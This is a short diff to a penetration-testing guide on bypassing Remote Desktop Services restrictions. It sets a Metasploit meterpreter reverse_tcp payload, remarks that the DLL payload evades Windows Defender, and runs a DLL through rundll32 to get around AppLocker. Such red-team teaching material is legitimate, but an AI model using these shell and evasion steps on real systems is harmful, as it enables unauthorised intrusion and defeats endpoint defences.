chryzsh/DarthSidious/bypassing-rds.md

 set payload windows/x64/meterpreter/reverse_tcp
 exploit
 ```
 Download the msf.dll using the IE "save as" trick from before.
-For some reason I am not sure the dll payload is not taken by Windows Defender, not on disk and not when executed.
+For some reason I am not sure why the dll payload is not eaten by Windows Defender, not on disk and not when executed.
+It could possibly be the x64 signature of the payload is not yet recgonized as malware by Defender.

 Now, use rundll32 to execute the dll.
 We use this because rundll32 is a binary that will not be blocked by Applocker.

 `rundll32 .\PowerShdll.dll,Control_RunDLL`